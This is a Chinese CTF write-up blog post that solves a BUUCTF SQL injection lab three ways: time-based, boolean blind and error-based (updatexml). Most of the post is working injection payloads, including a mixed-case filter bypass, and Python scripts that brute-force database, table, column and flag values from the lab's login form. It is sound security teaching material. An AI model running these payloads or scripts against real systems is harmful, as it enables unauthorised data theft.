一道题讲懂SQL盲注 / [第一章 web入门]SQL注入-2

最新推荐文章于 2024-02-26 21:00:10 发布
最新推荐文章于 2024-02-26 21:00:10 发布
阅读量2k 收藏 19
点赞数 9
分类专栏: 安全 CTF WEB安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/satasun/article/details/111119805
版权
安全 同时被 3 个专栏收录
49 篇文章 6 订阅
订阅专栏
CTF
40 篇文章 1 订阅
订阅专栏
WEB安全
38 篇文章 0 订阅
订阅专栏

概述

项目地址
本题是一个盲注题,可以基于布尔也可以基于时间,如果不会的话可以根据提示在网址后面加一个?tips=1降低难度成为一个基于报错的盲注。
本题所有脚本均用傻逼爆破,没有用二分法,有兴趣的大佬可以根据我提供的脚本二次开发,可以的话在评论区给个链接(菜鸡对二分法不是很懂,觉得写脚本的时间还不如等爆破完成)

解法一:基于时间

在这里插入图片描述
直接在前端进行注入的话没有报错回显,所以需要抓个包然后开始测试。

测库名

首先测试库名长度

name=1'+or+if(length(database())=4,sleep(1),1)#&pass=asdasd

在这里插入图片描述
等了3秒,我们默认是sleep1秒,但是不知道为什么睡的时间是输入的3-4倍左右,不管了,反正长度是4(1-4慢慢试)

然后测试库名:

  • 这里补充一个知识点,MySQL的substr函数substr(a,b,c)a处为需要截取的字符,b处为从第几位开始,c处为截取几位。比如substr(database(),2,1)就是将数据库名从第2位开始截取1位,即取第二个字符(如果库名为note结果就是o
name=1'+or+if(substr(database(),1,1)='n',sleep(1),1)#&pass=asdasd

在这里插入图片描述
过了三秒才有回显,于是判断第一位是n
写个脚本

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"
flag = ''

length=4
for num in range(1,length+1):
    for i in l:
        data = {
            'name' : sql %(num,i),
            'pass' : 'asdasd'
        }
        # print(data)
        t = int(time.time())
        r = requests.post(url = url , data=data)
        if int(time.time()) - t > 2 :
            flag += i
            print("flag:" , flag)
            break
print(flag)

在这里插入图片描述

测试表名

注意,这里‘select’被过滤了,可以使用双写绕过,也可以使用大小写绕过

name=1'+or+if(substr((seLEct+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),1,1)='f',sleep(1),1)#&pass=asdasd

测第一位,结果是f
脚本:

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"
sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"
flag = ''


for num in range(1,100):
    for i in l:
        data = {
            'name' : sql %(num,i),
            'pass' : 'asdasd'
        }
        # print(data)
        t = int(time.time())
        r = requests.post(url = url , data=data)
        if int(time.time()) - t > 2 :
            flag += i
            print("flag:" , flag)
            break
print("flag:", flag)

在这里插入图片描述

测试字段名

name=1'+or+if(substr((seLEct+group_concat(column_name)+from+information_schema.columns+where+table_name='fl4g'),1,1)='f',sleep(1),1)#&pass=asdasd

第一位是f,盲猜是flag,但是还是测试一下:

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"
#sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"
sql = "1' or if(substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s',sleep(2),1)#"
flag = ''


for num in range(1,100):
    for i in l:
        data = {
            'name' : sql %(num,i),
            'pass' : 'asdasd'
        }
        # print(data)
        t = int(time.time())
        r = requests.post(url = url , data=data)
        if int(time.time()) - t > 2 :
            flag += i
            print("column_name:" , flag)
            break
print("column_name:", flag)

字段名是flag
在这里插入图片描述

cat flag

查flag长度

name=1'+or+if(length((seLEct+flag+from+fl4g))=26,sleep(3),1)#&pass=asdasd

长度为26。

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"
#sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"
#sql = "1' or if(substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s',sleep(2),1)#"
sql = "1' or if(substr((seLEct flag from fl4g),%d,1)='%s',sleep(2),1)#"
flag = ''
for num in range(1,27):
    for i in l:
        data = {
            'name' : sql %(num,i),
            'pass' : 'asdasd'
        }
        # print(data)
        t = int(time.time())
        r = requests.post(url = url , data=data)
        if int(time.time()) - t > 2 :
            flag += i
            print("flag:" , flag)
            break
print("flag:", flag)

在这里插入图片描述

解法二:基于布尔

分析

首先研究一下登录界面的报错信息
在这里插入图片描述
在这里插入图片描述
用admin登录,显示密码错误,用其他账号登录,显示账号不存在。这样子就说明了两个点:

  • 默认用户是admin
  • 用户名栏可以判断我们的输入是True 还是False

burp抓包并发送试试:
在这里插入图片描述
在这里插入图片描述

admin:    {"error":1,"msg":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}
w4ke:     {"error":1,"msg":"\u8d26\u53f7\u4e0d\u5b58\u5728"}

这里都是页面信息,那么我们可以根据这个信息来进行判断我们的输入是否正确,构造payload:

name=1' or 1=1#&pass=asdasd

在这里插入图片描述
发现页面返回的信息是True,这里解释一下为什么是True:

首先判断username = '1'  ⇒  False
然后判断 1=1 ⇒ True
False or True ⇒ True

所以只要后面构造的是True,那么整个语句就是True,然后开始构造第一个攻击脚本

测试库名

name=1' or length(database())=4#&pass=asdasd

在这里插入图片描述
数据库长度为4

name=1' or substr(database(),1,1)='n'#&pass=asdasd

在这里插入图片描述
库名第一个字母是n
构造脚本:

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
sql = "1' or substr(database(),%d,1)='%s'#"
flag = ''
for num in range(1,5):
    for i in l:
        data = {
            'name' : sql %(num,i),
            'pass' : 'asdasd'
        }
        r = requests.post(url = url , data=data)
        time.sleep(0.2)
        if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text:
            flag += i
            print("flag:" , flag)
            break
print("flag:", flag)

在这里插入图片描述

测表名

name=1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='f'#&pass=asdasd

在这里插入图片描述
表的第一位是f
上脚本

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or substr(database(),%d,1)='%s'#"
sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"
flag = ''
for num in range(1,8):
    for i in l:
        data = {
            'name' : sql %(num,i),
            'pass' : 'asdasd'
        }
        r = requests.post(url = url , data=data)
        time.sleep(0.2)
        if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text:
            flag += i
            print("flag:" , flag)
            break
print("flag:", flag)

在这里插入图片描述

测字段名

name=1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),1,1)='f'#&pass=asdasd

在这里插入图片描述
字段名的第一位也是f

上脚本:

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or substr(database(),%d,1)='%s'#"
#sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"
sql = "1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s'#"
flag = ''
for num in range(1,13):
    for i in l:
        data = {
            'name' : sql %(num,i),
            'pass' : 'asdasd'
        }
        r = requests.post(url = url , data=data)
        time.sleep(0.2)
        if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text:
            flag += i
            print("flag:" , flag)
            break
print("flag:", flag)

在这里插入图片描述

cat flag

name=1' or substr((seLEct flag from fl4g),1,1)='n'#&pass=asdasd

在这里插入图片描述
第一位是n
上脚本:

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or substr(database(),%d,1)='%s'#"
#sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"
#sql = "1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s'#"
sql = "=1' or substr((seLEct flag from fl4g),%d,1)='%s'#"
flag = ""
for num in range(1,28):
    for i in l:
        data = {
            'name' : sql %(num,i),
            'pass' : 'asdasd'
        }
        r = requests.post(url = url , data=data)
        time.sleep(0.05)
        if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text:
            flag += i
            print("flag:" , flag)
            break
print("flag:", flag)

在这里插入图片描述

解法三:基于报错

首先题目提示难度太大可以在url后面加一个?tips=1,菜鸡发现这边可以显示报错信息。
一般常用的报错函数有extractvalue,updatexml等,用法差不多,这边就用updatexml吧。

爆库名

name=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&pass=asdasd

在这里插入图片描述
这里直接爆出数据库名

爆表名

name=1' and updatexml(1,concat(0x7e,(seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&pass=asdasd

在这里插入图片描述

爆字段名

name=1' and updatexml(1,concat(0x7e,(seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),0x7e),1)#&pass=asdasd

在这里插入图片描述

cat flag

name=1' and updatexml(1,concat(0x7e,(seLEct flag from fl4g),0x7e),1)#&pass=asdasd

在这里插入图片描述

imbia
关注
  • 9
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
WEB入门——SQL注入(二)
HasntStartIsOver的博客
06-03 268
二次注入和绕过
Web入门Sql注入(二)
qq_51459823的博客
11-16 1075
通过触发 SQL 错误来诱导条件响应 在前面的示例中,假设应用程序执行相同的 SQL 查询,但根据查询是否返回任何数据,行为没有任何不同。前面的技术将不起作用,因为注入不同的布尔条件对应用程序的响应没有影响。 在这种情况下,根据注入的条件,通常可以通过有条件地触发 SQL 错误来诱导应用程序返回条件响应。这涉及修改查询,以便在条件为真时会导致数据库错误,但如果条件为假则不会。很多时候,数据库抛出的未处理的错误会导致应用程序的响应(例如错误消息)出现一些差异,从而使我们能够推断注入条件的真实性。 要查看
第三章-SQL语言练习和答案.doc
11-17
第三章-SQL语言练习和答案.doc
第8章 8.WEB安全性测试--SQL注入四.mp4
05-08
第8章 8.WEB安全性测试--SQL注入四.mp4
[第一章 web入门]SQL注入-2 目分析与详解
最新发布
2302_79800344的博客
02-26 813
一、目简介。
web渗透测试详细入门实践课程-kali/sql注入
06-20
web渗透测试/渗透工具kali 渗透原理 渗透前期(网络踩点、网络扫描、网络查点) 渗透中期(利用漏洞信息进行渗透攻击、获取权限) 渗透后期(后渗透维持攻击、文件拷贝、代码植入、痕迹擦除) 渗透测试定义 渗透测试就是一种模拟恶意攻击者的技术与方法,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方式。 本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源包:包括虚拟机环境搭建的镜像、丰富的网络安全工具安装包和组网工具安装包等
第5章 5.WEB安全性测试--SQL注入一.mp4
05-08
第5章 5.WEB安全性测试--SQL注入一.mp4
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
Access 偏移注入:解决列名获取不到的情况查看登陆框源代码的表单值或观察 URL 特征等也可以针对表或列获取不到的情况select 查询数据在网站应用中进行
[web入门]SQL注入-2
1tachi的博客
12-02 559
请原谅我发出一点不友好的声音: 每个人无论是做完了,还是没做完,他只要是想进步,都会搜一下WP,尤其是BUUCTF的WP更有必要搜一下,为的是更标准、更多的思路,不成想我搜索发现,清一色! 思路一摸一样,用的函数一模一样,更甚之有的连思路都没有,上来就报错注入,生怕别人不知道他是抄的wp。。。令人无语! 我写的这个是我自己的思路,权当是留作笔记吧,或者是一点不健康的牢骚。。。 ...
《从0到1》[第一章 web入门]SQL注入
m0_63253040的博客
03-21 157
进入环境 url里有?id=1,存在sql注入,当id=4时有提示 左上角会有查询语句的显示,我们直接开始注入 先看字段数,到4时无回显 看回显位置 爆数据库:note 爆数据表:fl4g,notes 爆字段:fllllag 查数据:n1book{union_select_is_so_cool} ...
[第一章 web入门]SQL注入-2
weixin_40546436的博客
07-23 1060
1 通过updatexml取数据 从页面发现有一个提示 如果加上?tips=1的话,通过burpsuite发包可以通过updatexml来查看回显,可以通过这个取到数据 下面是通过updatexml来注入,这时4步中用到语句 name=admin’ and updatexml(1,concat(0x7e,(select(database())),0x7e),1) #&pass=bb name=admin’ and updatexml(1,concat(0x7e,(selEct(group_conc
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2
weixin_40872714的博客
03-28 852
CTHUB-N1Book-第一章Web入门-CTF中的SQL注入-SQL注入-2 查看html代码,看到有一个提示,说明是要我们报错注入 先抓包,加了tips=1后就会有报错的信息 首先报数据库 note 尝试报表名,出错了,根据错误信息,可能是前面的select被过滤了,这里就是不断尝试,没有什么好的方法 使用双写绕过 获得了关键的fl4g表,flag应该就在这里面 尝试报字段名得到flag字段 直接得到flag ...
ctfshow web入门 sql注入(超详解)201-250
qq_50589021的博客
08-23 4192
web201 查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';"; 返回逻辑 //对传入的参数进行了过滤 function waf($str){ //代码过于简单,不宜展示 } 需要学会: 使用--user-agent 指定agent --user-agent="Mozilla/5
[第一章 web入门]SQL注入-1,[第一章 web入门]SQL注入-2
m0_73721944的博客
11-14 64
得到payload:name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+&pass=1' and 1=2 --+-- 如果觉得太难了,可以在url后加入?id=1 and 1=1--+ 正常。id=1' and 1=1--+ 正常。打开是这样的,很明显在url中存在注入点。
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
weixin_66146598的博客
06-09 4558
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析),《从0到1:CTFer成长之路》书籍配套目之sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第二个参数应为合法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
CTF-web安全sql注入
信息安全专题
10-21 255
web安全sql注入 sql注入介绍 信息探测 这里的基本操作与之前的没有什么出入, 深入挖掘 深入挖掘,之后我们发现了一个敏感的网址/admin/login.php 打开之后,我们发现了一个类似的登录界面,这个时候,我们尝试使用弱口令,发现无法登陆,那我们就要去找用户名和密码了: 漏洞扫描 使用owasp-zap这个非常好用的漏洞扫描器: 打开owasp-zap: 对靶场进行攻击: 进行自动扫描,之后我们分析扫描结果: 我们发现了一个高危漏洞:sql注入 漏洞利用 接下来我们就要
BUUCTF [第一章 web入门]SQL注入-2
qq_45707441的博客
12-22 2316
经分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"} 当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"} 根据返回的字符串,我们可以写出解决的python脚本 #数据库名字长度 import string import requests url="http://e2cc3e..
[第一章 web入门]sql注入-2
03-16
SQL注入是一种常见的网络攻击方式,攻击者通过在输入框中输入恶意代码,从而获取数据库中的敏感信息或者对数据库进行恶意操作。为了防止SQL注入攻击,我们需要对输入进行过滤和验证,同时使用参数化查询等安全措施来保护数据库的安全。在开发过程中,我们也需要注意代码的安全性,避免出现SQL注入漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值